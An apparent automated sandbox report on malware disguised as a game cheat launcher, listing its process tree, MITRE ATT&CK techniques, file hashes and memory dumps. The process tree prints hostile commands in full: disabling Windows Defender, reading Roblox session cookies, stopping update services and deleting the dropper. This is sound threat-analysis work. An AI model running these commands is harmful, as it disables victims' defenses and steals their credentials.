        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1444
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        5⤵
        
        PID:2680
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        
        PID:2768
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        
        PID:4000
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        5⤵
        
        PID:3384
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        5⤵
        
        PID:2044
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        5⤵
        
        PID:640
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        
        PID:3684
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:4868
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        5⤵
        
        PID:1444
      - C:\Windows\system32\PING.EXE
        
        ping localhost
        6⤵
        Runs ping.exe
        
        PID:1996
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1896
  - - C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
      "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
      4⤵
      PID:4468
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:3376
  - - C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
      "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
      4⤵
      PID:2312
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4656
    - - C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        5⤵
        
        PID:2996
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4612
    - - C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        5⤵
        
        PID:3328
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:524
    - - C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        5⤵
        
        PID:1856
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:2344
    - - C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        5⤵
        
        PID:2088
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5104
      - C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        6⤵
        
        PID:4952
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4464

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3920,i,1067197275908310731,12785105794523264014,262144 --variations-seed-version --mojo-platform-channel-handle=3528 /prefetch:8
1⤵
PID:4664

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
1⤵
PID:2832
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:4468
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:2596
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:5112
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:5008
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:1416
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:3004
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:3668
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:1456
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:1260
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  PID:3220

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\CrackLauncher.exe.log

Filesize
654B

MD5
2ff39f6c7249774be85fd60a8f9a245e

SHA1
684ff36b31aedc1e587c8496c02722c6698c1c4e

SHA256
e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

SHA512
1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Запустить Nursultan.exe.log

Filesize
1KB

MD5
4c8fa14eeeeda6fe76a08d14e08bf756

SHA1
30003b6798090ec74eb477bbed88e086f8552976

SHA256
7ebfcfca64b0c1c9f0949652d50a64452b35cefe881af110405cd6ec45f857a5

SHA512
116f80182c25cf0e6159cf59a35ee27d66e431696d29ec879c44521a74ab7523cbfdefeacfb6a3298b48788d7a6caa5336628ec9c1d8b9c9723338dcffea4116

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSBuild.exe.log

Filesize
522B

MD5
8334a471a4b492ece225b471b8ad2fc8

SHA1
1cb24640f32d23e8f7800bd0511b7b9c3011d992

SHA256
5612afe347d8549cc95a0c710602bcc7d7b224361b613c0a6ba362092300c169

SHA512
56ae2e83355c331b00d782797f5664c2f373eac240e811aab978732503ae05eb20b08730d2427ed90efa5a706d71b42b57153596a45a6b5592e3dd9128b81c36

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Nursultan.exe.log

Filesize
617B

MD5
47504b42411e2c23666d08795adae488

SHA1
92ba780125e2fcedc6223478504aa501adf95c06

SHA256
4b2747d4a45ae359c415f11d2a2d9e09e6a036aad39b40e284850603b64bbc98

SHA512
a2d33cb21ec121b9f857c81df3992da216859f5df69cc8da9edbd91eeb21f45b7ac79459d0c6bc08f09bc33684dfff62a20feddd13d5367ad717095ac85fe9c1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
b3c3db201c6e1fc54f0e17762fe03246

SHA1
249bfcef33cdd2d6c13a7cc7c9c1d73905fb51d6

SHA256
6771a83a83da5d6ce23e9cfa5567eb70084dffd51a7c07130ba3379cff78a59f

SHA512
2945c6f4e05b86e161b9753fca74cc9daf76e8ef535cdff0e9d83cca706eabd6e1ca3aba55005b2d16c2023f6604ee6886837336a63f421fa25f73120cfc00a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
5824a6037c081fda5d46de274b6e2799

SHA1
526367a09300cbde430e8fb44e41cbe7a0937aac

SHA256
4d610d9cd32a20279c7133a726ff61820d6930e5aa18253ee1422f3a6f54953f

SHA512
a109b150f730cda78d5bee106bd232f9dca7500dfb7899c6919de2bd542e345ca271aa11809a24ea0a27dca158067ab3a2d5688ac0a2325185143245f1665582

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
05ec006920bcc71908d5c556f65bcfb9

SHA1
e6bb9c1c50b0b54371289d611dbd5808cce8f931

SHA256
a98a56c58b1c22ea3410ff68c7a3e9d3da95a41f7a27cae5faf1f55d8102ad17

SHA512
e779e4f16061c27a66ff442fa9d1c6f2f43ff70f3b7639aa9b8bbf72ac460437a80990e30228c1718df24530f4665c9407ea8e6cf61bc6e7278c2defb461961d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ef647504cf229a16d02de14a16241b90

SHA1
81480caca469857eb93c75d494828b81e124fda0

SHA256
47002672443e80410e55a0b6d683573ac27d70d803b57ee3c2818d1008669710

SHA512
a6d8c08c708eee6f7e700880ce79d2ba7cd0acbe8529d96e18f3e90ea1f3cf33fd801dd6eba6017cdd02769e968c48278c090c1deeac710124f79423cd862ee1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cae60f0ddddac635da71bba775a2c5b4

SHA1
386f1a036af61345a7d303d45f5230e2df817477

SHA256
b2dd636b7b0d3bfe44cef5e1175828b1fa7bd84d5563f54342944156ba996c16

SHA512
28ed8a8bc132ef56971cfd7b517b17cdb74a7f8c247ef6bff232996210075e06aa58a415825a1e038cfb547ad3dc6882bf1ca1b68c5b360ef0512a1440850253

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9c740b7699e2363ac4ecdf496520ca35

SHA1
aa8691a8c56500d82c5fc8c35209bc6fe50ab1d9

SHA256
be96c91b62ba9ba7072ab89e66543328c9e4395150f9dbe8067332d94a3ecc61

SHA512
8885683f96353582eb871209e766e7eba1a72a2837ce27ea298b7b5b169621d1fa3fce25346b6bfd258b52642644234da9559d4e765a2023a5a5fc1f544cc7af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
a8d16ceddc273e3a60a4a43d2ae6c1e6

SHA1
9cc2ca0377893834dfbb4b03eb79ef4fcfda42d7

SHA256
5f13b57f07bf87a61ef985dbc66f832bb7a3521d47dc1c7bd6badf27a7b25323

SHA512
0505c9d84ece0758458303b2ca6218c1dcbf1e6d6a03f9880709b09aebf8c3bd4326736ed3ec4d8471e4b65fdc9b28bf53480e62edad239f78376f79fb610b6c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9b80cd7a712469a4c45fec564313d9eb

SHA1
6125c01bc10d204ca36ad1110afe714678655f2d

SHA256
5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d

SHA512
ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
966914e2e771de7a4a57a95b6ecfa8a9

SHA1
7a32282fd51dd032967ed4d9a40cc57e265aeff2

SHA256
98d3c70d7004fa807897317bd6cd3e977b9b6c72d4d2565aca0f9f8b1c315cba

SHA512
dc39c7124a9c7c8d4c7e8e16290c46360b8d9a8f4e43edaacbbeb09bdcf20159a53db54d2b322372001b6a3de52b2f88e9088b5fdbc7638816ae0d122bb015f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
c109106b5217c4d26f9ec70506d3d277

SHA1
99d1fd81f166cbbf55ce6c660b9e7c434744be0d

SHA256
78d75452b56ca04557fc48458d0ed14025320689e689d2e0382a8234f289bfb0

SHA512
f5e5cd20147bb4a9d40202a4f61709f3a326c48d991beca126277dc30453f310b72347836f511b68e9e9152d0387a5bcbaa042abd79cbffb0e11d79d5e2a4e53

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ca7a092166a89f36bbca790d97e5b177

SHA1
ff80a554c5fb4c2f19eab7f254c7a21c507ea31f

SHA256
403d61c959fcf05567f2b05cf2acb011bbda99faf2502a0651d978d28a9b8a5b

SHA512
25ada0602ce3c12a8f2accc4f5b76026e078b34f39a9b792f9123b176be555e50241cd3c4a2acec7883afd58f0162c13c0e403ad9e387e22e6ce182c0086be99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ba169f4dcbbf147fe78ef0061a95e83b

SHA1
92a571a6eef49fff666e0f62a3545bcd1cdcda67

SHA256
5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1

SHA512
8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
052b68d98977d4f52cc6afabfa743b06

SHA1
63b671a71cc5ec6b76218b0094784a5e21e08e7f

SHA256
199ac916bb90b9b2107eb749d5c65411c387c7d59f0a2d19d17674983287116a

SHA512
e20517e1d3b755c17c617f9cbab3de19a4b29fc16a3422bbde30530130c2865173b85ee24e336b20c4706740250bc062f789d0c6989d4ed15c6f8527033693af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
40dd43bb93036efa55873bb3a5bfd064

SHA1
6de7c97d77783ed8d65a882de1a65b787fc669c7

SHA256
01b5ee20470f430922a747a71ea96cce28434a593e15b56be747c560ab608601

SHA512
3ea0ec040d119ee20920d349378f9e939561a1b0ddddcd6b8b367e391a147fc0d7b11829e39f42736f7b599e8b9f764eeca46f45e3c0dab67cea1371676b1477

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
96ff1ee586a153b4e7ce8661cabc0442

SHA1
140d4ff1840cb40601489f3826954386af612136

SHA256
0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

SHA512
3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
7d9ecfe610b58440e18d2bffe5167d71

SHA1
7afeed064042ef5e614228f678a0c595699c3d84

SHA256
2c42082be2718281fe2a2bf0136bf417ff214ce7c36bc22a40d23adb1d026632

SHA512
017a63c4b81cd256adec796b9258fbae464d32af59cb654a81dd157e02896f50a252c25b6eac07fc6cb44a493b477e7debfaf9999c854dbd3fb34e24ef443c29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
15dde0683cd1ca19785d7262f554ba93

SHA1
d039c577e438546d10ac64837b05da480d06bf69

SHA256
d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961

SHA512
57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

Download Submit
C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

Filesize
2.5MB

MD5
a1d8db2a1ff742bc73dd5617083f5fde

SHA1
957b182d82efb40a36099dd886ad581977880838

SHA256
d715e599815190df86069fae7220db64b5999207f77fb6e41cfe318d34c7399a

SHA512
0c5407f5707e5f2808cf1d85d71815ca67d45edc8bd8a83cc424dc927afcbad6ced5a826fff81549e5684ca0ece039513c3351ce7bf231e37885f7ed04dc513f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

Filesize
1.2MB

MD5
fc78e6de08047713a0c8b663c108c697

SHA1
6ddad96075f87d83e1857e23c83fda78fe6b4662

SHA256
50f3ae32f89f24830ac361287219590c11e5781dca1c99f0b635e66f4a53d867

SHA512
3ead4d29988b850417994517211134ea88a8be038aab2111076c7b74150ed68ffb5b67236e293329fc4ab60b2391ca3e656c541cb65f6d83383b16d1b98556e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

Filesize
1.9MB

MD5
0df0a039309525fd27e1b5e056c92b6a

SHA1
7551c27a9123cb56c4218647966a753794ac2961

SHA256
a29379238f93fa6301dd390e635b0c1f53d9197c68adc0f00cbc52bb4311a23f

SHA512
2c00ea216368e254167bd5f2562cbc93953b9c4756765f4504aaae7e9dc45e5584fef1ddb174b651a9a090c7217424e5b80dec58f6f2493c54704f46c35fede6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lod4ix0c.bw4.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

Filesize
229KB

MD5
f0b33cc162bfd36a995b8c90cd8ebff1

SHA1
ca1ddef08d47fc15a44a2d651b61e3decce8ebc6

SHA256
6363305dc75b8bf7aa2a8b31b0b0f38022fb0139f809ecba42e5cfe7530830e0

SHA512
1426cd246662adfd9aba4434586dc3bd54d31d395d9fafdcb15e785461a466567bff62e85085c36043cca047f951a96e5fc359c5cbf1000ff3121bba6b2905d0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk

Filesize
1KB

MD5
1293d985ff5414bf611a62261e79b2d1

SHA1
d9659f177ac72bbb4b2eea10cc654bb6af9ac59f

SHA256
5a504bf9e653104069432687fec80b189d085e15372d5a3c116e62e93e769c17

SHA512
86249434a9da235878b8b5462ee1c547ae373eda53914e4741b1223d866574c629204b2d1fa1dec2efe6bef18ba2874c6247a3bf00f0d3c30a95715cfa1b5fed

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
4028457913f9d08b06137643fe3e01bc

SHA1
a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14

SHA256
289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58

SHA512
c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

Download Submit
memory/640-526-0x0000014CC8180000-0x0000014CC8235000-memory.dmp

Filesize
724KB

Download
memory/640-545-0x0000014CC8390000-0x0000014CC8398000-memory.dmp

Filesize
32KB

Download
memory/640-525-0x0000014CC8160000-0x0000014CC817C000-memory.dmp

Filesize
112KB

Download
memory/640-531-0x0000014CAD7D0000-0x0000014CAD7DA000-memory.dmp

Filesize
40KB

Download
memory/640-533-0x0000014CC83A0000-0x0000014CC83BC000-memory.dmp

Filesize
112KB

Download
memory/640-534-0x0000014CC8380000-0x0000014CC838A000-memory.dmp

Filesize
40KB

Download
memory/640-535-0x0000014CC83E0000-0x0000014CC83FA000-memory.dmp

Filesize
104KB

Download
memory/640-548-0x0000014CC83D0000-0x0000014CC83DA000-memory.dmp

Filesize
40KB

Download
memory/640-547-0x0000014CC83C0000-0x0000014CC83C6000-memory.dmp

Filesize
24KB

Download
memory/1260-563-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1260-566-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1260-559-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1260-560-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1260-562-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1260-561-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2704-460-0x0000000070040000-0x000000007008C000-memory.dmp

Filesize
304KB

Download
memory/3096-74-0x00007FFBF90F0000-0x00007FFBF9BB1000-memory.dmp

Filesize
10.8MB

Download
memory/3096-1-0x0000000000FE0000-0x00000000012E0000-memory.dmp

Filesize
3.0MB

Download
memory/3096-18-0x00007FFBF90F0000-0x00007FFBF9BB1000-memory.dmp

Filesize
10.8MB

Download
memory/3096-0-0x00007FFBF90F3000-0x00007FFBF90F5000-memory.dmp

Filesize
8KB

Download
memory/3220-568-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3220-577-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3220-579-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3220-578-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3220-573-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3220-576-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3672-100-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/3672-530-0x0000000006120000-0x00000000061B2000-memory.dmp

Filesize
584KB

Download
memory/3672-532-0x00000000060E0000-0x00000000060EA000-memory.dmp

Filesize
40KB

Download
memory/4276-290-0x0000000005EE0000-0x0000000006234000-memory.dmp

Filesize
3.3MB

Download
memory/4276-326-0x0000000070040000-0x000000007008C000-memory.dmp

Filesize
304KB

Download
memory/4284-86-0x0000000005010000-0x00000000050AC000-memory.dmp

Filesize
624KB

Download
memory/4284-90-0x00000000057F0000-0x00000000058A6000-memory.dmp

Filesize
728KB

Download
memory/4284-88-0x0000000005DA0000-0x0000000006344000-memory.dmp

Filesize
5.6MB

Download
memory/4284-80-0x00000000004A0000-0x0000000000688000-memory.dmp

Filesize
1.9MB

Download
memory/4464-243-0x0000000007A60000-0x00000000080DA000-memory.dmp

Filesize
6.5MB

Download
memory/4464-213-0x0000000005A90000-0x0000000005AF6000-memory.dmp

Filesize
408KB

Download
memory/4464-209-0x00000000027C0000-0x00000000027F6000-memory.dmp

Filesize
216KB

Download
memory/4464-271-0x0000000007760000-0x000000000777A000-memory.dmp

Filesize
104KB

Download
memory/4464-270-0x0000000007660000-0x0000000007674000-memory.dmp

Filesize
80KB

Download
memory/4464-269-0x0000000007650000-0x000000000765E000-memory.dmp

Filesize
56KB

Download
memory/4464-256-0x0000000007620000-0x0000000007631000-memory.dmp

Filesize
68KB

Download
memory/4464-255-0x00000000076A0000-0x0000000007736000-memory.dmp

Filesize
600KB

Download
memory/4464-245-0x0000000007490000-0x000000000749A000-memory.dmp

Filesize
40KB

Download
memory/4464-244-0x0000000007420000-0x000000000743A000-memory.dmp

Filesize
104KB

Download
memory/4464-242-0x0000000007300000-0x00000000073A3000-memory.dmp

Filesize
652KB

Download
memory/4464-241-0x00000000066C0000-0x00000000066DE000-memory.dmp

Filesize
120KB

Download
memory/4464-231-0x0000000070040000-0x000000007008C000-memory.dmp

Filesize
304KB

Download
memory/4464-230-0x00000000072C0000-0x00000000072F2000-memory.dmp

Filesize
